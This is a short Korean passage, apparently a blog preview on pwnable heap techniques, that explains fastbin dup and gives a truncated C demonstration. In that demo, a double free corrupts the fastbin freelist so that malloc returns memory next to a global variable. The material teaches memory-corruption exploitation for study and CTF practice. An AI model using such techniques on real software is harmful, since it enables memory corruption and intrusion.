포너블/Heap
fastbin dup, fastbin dup consolidate & Unsafe unlink
fastbin dup공격조건glibc 2.25이하, 임의로 malloc과 free 가능fastbin dup란?double free를 이용하여 fastbin freelist를 조작해 이미 할당된 메모리에 다시 힙청크를 할당하는 공격 기법이다.#include #include long win;int main(){ long *ptr1, *ptr2, *ptr3, *ptr4; *(&win - 1) = 0x31; ptr1 = malloc(0x20); ptr2 = malloc(0x20); free(ptr1); free(ptr2); free(ptr1); ptr1 = malloc(0x20); ptr2 = malloc(0x20); ptr1[0] = &win - 2; ptr3 = malloc(0x20); ptr4 = m..
